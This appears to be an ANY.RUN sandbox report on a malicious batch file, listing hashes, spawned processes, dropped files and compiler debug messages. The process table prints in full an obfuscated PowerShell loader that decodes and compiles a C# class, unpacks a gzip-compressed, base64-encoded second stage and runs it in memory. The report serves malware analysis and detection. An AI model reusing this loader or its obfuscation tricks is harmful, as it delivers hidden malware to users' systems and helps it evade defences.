File name: | itlala.bat |
Full analysis: | https://app.any.run/tasks/f8fe8781-a27c-475b-bc10-36fd0b1621b4 |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 10:02:38 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | FB05C57CD1936FFB0CEAB5BEAEFCCD3D |
SHA1: | B6017C7FABABEAC6169752BFF618980FEE00E06A |
SHA256: | 9D4E16A3F2632F42AF871B3B80BED7E1EA8F443EB7AED9E6EAA214784D3EB508 |
SSDEEP: | 96:YwEYxbBpzZmyUT8vlNjAaNxQRA4MdYEk6UDP1FvO7EkQ0aWWfZ:5x3Ku5AavEA4l56UDP1I7bWfZ |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2744 | cmd /c ""C:\Users\admin\AppData\Local\Temp\itlala.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2252 | powersHeLl -nop -NonintErACti -Win 000000000000001 -exEcutioNpo bypASs .(('Set-'+'Va')+'ri'+('a'+'ble')) -Name ('dq') -Value ([Text.Encoding]::"\"Ut`F8"\"."\"Get`sT`RiNG"\"([Convert]::(('F'+'ro')+('m'+'Ba')+'se'+'64'+('S'+'tri'+'ng')).Invoke(('dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb'+'25zLk9iamVjd'+'E1vZGVsOw0KdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0K'+'dXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLklPLkNv'+'bXByZXNzaW9uOw0KDQpwdWJsaWMg'+'Y2xhc3MgSk9iVnpqQnlKd0lnRVBxd1lMdkxEZWFsVXtwdWJsaWMgc3RhdGljIHZvaWQgZFJhVVljT0NjRWZucUFHbUlsWktGY1Fucigpe1Bvd2VyU2hlbGwgcHMgPSBQb3dlclNoZWxsLkNyZWF0ZSgpOw0Kc3RyaW5nIGZyZT0iSXdnQUFCK0xDQUFBQUFBQUJBQk5'+'sY2Z'+'PM0lv'+'TmhWL0Zpd3Y0TjVSWWRWVHVUb'+'TJrVWUvTjhFSjkxSHRGSGo3am0wMTJCQThKRUNSNHZpK05QLzQ5TURX'+'Zk90L3N5M1p5OWVkTC8ybXZWazUzRmg5bitmejE5WDhsSDQzVlZjUGlGN3ZTKzU5Y1hpaXh3eS9Pbk1mcTE2K1AydVdkYm9YMlA0bmYzMzZsZytibGx2UDc3NytmODlBbDhaTGp'+'tTzFZcjc3OCt2WTk4S0k1b3dhTU42RFpxQjlMN'+'2E5SHlW'+'MDRTKzZqM'+'Ex5R0RiT1Jqa'+'nZqcTI0'+'dmtRNVNZVFBrVjluQ1ZBYWk5WFkxSTBQUjYrUll0d0xmRVdESnhMUnZ'+'ZWnpiRGh5'+'Z1hoYW8valdBbnRnNkR4TnU0UTFZM09jQTQ3Z0lnRnM0bjZUS0d3Z'+'1JXVDJDMkVUSG9DNlZYUG41ZXRqcFpGQlJSd3dIYUw5elFpWDdRSkNqaHNqQlk2VnVvWXlaZXF'+'udVdKSWE0dUh1UUdVVVRIak5ROFNUeTRwcytTVUtycDNxeTc'+'0alJFe'+'TFIa1Y0V1pFdHNKT3QvR0NjZVphbmpyTENxRHRGQVNnazhvNVFEK21kaFhsbjkxTzNhZ0N2VWM4SmVmUkhMTDI5bmdtWE14K1ZuSGtZL2wxN3BVald0a25iMEpOVDJKbUVMbGwrTnB1ODkvQ1VTQmxFZ2NqeTdwSmx'+'mVGJ4TStsZFd6N0ppaVJBRi9Ua3Z1c0ltamhobG10S1'+'lRejlrRHRDMHNwWDU5RnIzTEVLczRrL2xKZWVITjVKY3U'+'4U0xEZkRwSFVES1JJaHVsWExpYUp1emJybHM4MmVFSzYybHlQSERCL0xTYzR4YytUK2dxUXpWa2t4M0tsQUxXa0ZWQ'+'1FSNHJrV2tTKytvcXNENEljUHhydkZkREVPVXdISEZyVmEzVXZ3WjV'+'rVFVzamFMNEJqT2dwbFZvNnNncWRieW9SRStXeVVZZ2UxaFNzbTdNdEt'+'XMHdKekNDTm5oc1pucnRu'+'Y2h5dTdnVmU2aVVWO'+'UcxRjZwOUx2UWt5ZnJqNm5mcE9jTTJOM3pNTTErSnpOcmNqZFpnNkx5MUNva1B6cGxFazl'+'xeTcwT1NaTWdzSHVKLzhoQkUwNFN'+'ZQXBIV1dRNC9kV'+'EpCMEZTQmVXRUlnNkh6UW43SGFPYmFob2wwR'+'2RCWnprYWFmNm1FaXpIRGVOMVVLaU45R3ZkUW5EOWllNU56eW16WTJYZHg2dkZHQ'+'0tVU3RkaFdodzZrWEwwcHUxN1NQMXcwb3JIWDBlM2R'+'hUlpvcDh3MVdnOG1TTTU4YVpncEhodHVQRFZCME1yRXlLUGVzd2tGZDBxcFNjZ3AxSHZNNlFqTnNVczJtRHQ1VHJJV'+'2RXMStrNWdQT0JMMC'+'92Mk'+'gwbStFL1l5Z29xcnlzamRMbWZmTFI1cnFaeDVOeUtyUzBJYmR5Qksxc2pCR1h5M1V6UXA2QjJKc1loZSs3TW'+'ppV2xBdkNFVzl'+'tVVB4M05nZ3'+'g3ejR2RzREWk'+'hGckk5ZjBvL1lLR3VFYmFPcGJndlV'+'2Y3QydTlqTjB1SHl6UTRMbHZhenpTRmk2bW1JTVFwUGpyaVJzWlBQTGRvVk44MXErcHpLVGxCdlFvSkdtR0xxT3RQRzU1dUJlRlFBaFNpUy9FWlV2cW9jTjZqTmV1THZsQnRqL29YblM4cW9GWElNbmlaTTBseXRGT'+'U5RSW9kVVRjR1hXMitENEhKZHdtYStzejdQQ'+'kpTYnBEaUVHZkp'+'LSyt5clZ4T1NERlNPZHNzeEIv'+'RUFSTFN4cFJ1Tnc2cmlRa1g4c05hdmNLSWF6dH'+'h4UDE3R'+'isrY2tYWVNOOHhEcmtCNEtDaStuN0MxanZDSkpxWHBMeVJucGl6MHdUWmV3VGlGcTBOMCsybV'+'hUSWp'+'kbzZIVDdVc1FxREdCZ0ZNVGtPRU5LbHRha3kyWVlpc2FJY1Z'+'lbVIxbUFrZk5Rc1NVclBtazR2OElsQ0NseWVpcGp5Zk1HS2M0aU01'+'NFBFQlljdml1Rm4rVWtMQ2JzSWNJU2wrTkR3TzVRdnoyV0RJRmZVNWc0L0pwTldRVUxzaDByZ1Zqa1ZIcTE0cXRuZ24yaU9KVTVXdnpJSzFLV045eXh'+'SU2FrSlVmVURyY3o4MUdhd1BTRzdBNmwyaytpVUU3dFZzQ2UyeERxcXNSZ21xRlVnai9hc1VNbEhFZGNVa0ZwWXk0Wk5pZHFJYmF0M1FOaXdEaHJnRG9aRnYrbzhkcUNFRjZzakhNWXNzZVlHRUE1d01IRTlnYVd4QTN2TGk3SVpjNjNPSnYreGU4UU'+'ZBNkprdVQ5Y2haamt1RkpWYU0zbHBaM3ZHeGlCeDdTYmN2Y'+'m'+'UxOUF4RU5ObjltYjI3VE1oN2xRTTZaVythRzVkSDBTRUMrV2l4VnEvaTBZcnRzOE5lM1RraTRoZ2tsMjd4L2drRlF3Mz'+'BCTVpHWUptWWp1dUJIR2pCTDVkcnphSmNjUUFDS2hvOWhB'+'bHh6b'+'1VLSEJKZlMramlBTk1TU0RiQjlwd0dJcWw5MmpldVliQTJvLzFkYjV1ckFkeXpKTVBrQWdL'+'WFk3M0pEK3hSdFl3bE9KaEhaMko2TjNFVms3en'+'gyaE42Rm0yQUdMQ1p'+'VTklhMmdqUzlFVkM'+'1SE'+'RmdThBU3lSYlR1eERCWVc5OUpteXAzSWJLWE5tQm1NcGROMmdQYU4xSjV2dTNILy8'+'2dFlUMitnZk93eDhBanpOdkw2K2gveWUyOG1XcEJxM1RPZjdEMlN4bmh6ODVlL254'+'NlhMeWMvMlphK3pBVlZyNVVlbUZmV'+'lUvZnZ5Y1AyaGZoMXpqdm43ODUrZlh0Ny9zTjk4cVZmWUwvZzM4dFlqNS8yTDBOL0Q5L1A3anZ3cVE3VFFqQ0FBQSI7DQpieXRlW10gZ1ppcEJ1ZmZlcjIgPSBDb252Z'+'XJ0LkZyb21CYXNlNjRTdHJpbm'+'coZnJlKTt1c2luZyAodmFyIG1lbW9yeVN0cmVhbSA9IG5ldyBNZW1vcnlTdHJlYW0oKSl7aW50IGRhdGFMZW5ndGggPSBCaXRDb252ZXJ0ZXIuVG9JbnQzMihnWmlwQnVmZmVyMiwgMCk7bWVtb3J5U3RyZWFtLldyaXRlKGdaaXBCdWZmZXIyLCA0L'+'CBnWmlwQnVmZmVyMi5MZW5ndGggLSA0KTt2YXIgYnVmZmVyID0gbmV3IGJ5dG'+'VbZGF0YUxlbmd0aF07'+'bWVtb3J5U3RyZWFtLlBvc2l0aW9uID0gMDt1c2luZyAodmFyIGdaaXBTdHJlYW0gPSB'+'uZXcgR1ppcFN0'+'cmVhbShtZW1vcnlTdHJlYW0sI'+'ENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzKSl7Z1pp'+'cFN0cmVhbS5SZWFkKGJ1ZmZlciwgMCwgYnVmZmVyLkxlbmd0aCk7fWZyZT0oRW5jb2RpbmcuVVRGOC5HZXRTdHJpbmcoYnVmZmVyKSk7fQ0KcHMuQWRkU2Ny'+'aXB0KGZyZSk7cHMuSW52b2tlKCk7fX0='))));.('Ad'+('d-T'+'ype')) -TypeDefinition ${dQ};[JObVzjByJwIgEPqwYLvLDealU]::('d'+('R'+'aUY'+'cOC')+('cE'+'fnq')+'AG'+'mI'+('lZ'+'KFcQnr')).Invoke() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2440 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 1 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
2420 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2580 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PKVXUH64Q0M6M2DSKZ9P.temp | — | |
MD5:— | SHA256:— | |||
2440 | csc.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.pdb | — | |
MD5:— | SHA256:— | |||
2440 | csc.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.out | — | |
MD5:— | SHA256:— | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a6e9.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.cmdline | text | |
MD5:EB06EA4803DD2B690C2161FECFB71E12 | SHA256:02DCDDBA38B22BF70450534D54589A23652FE1EA19DF8EA6C98ABFDD27D827B0 | |||
2252 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ijmcfqca.0.cs | text | |
MD5:03D5D9EEE5C82DFD30330B80FF0E58E9 | SHA256:1A25B6E5B17421FAC5BF765671E268DFAC0B8C0C669A4742A2D369EA01BDCB5B |
Process | Message |
---|---|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|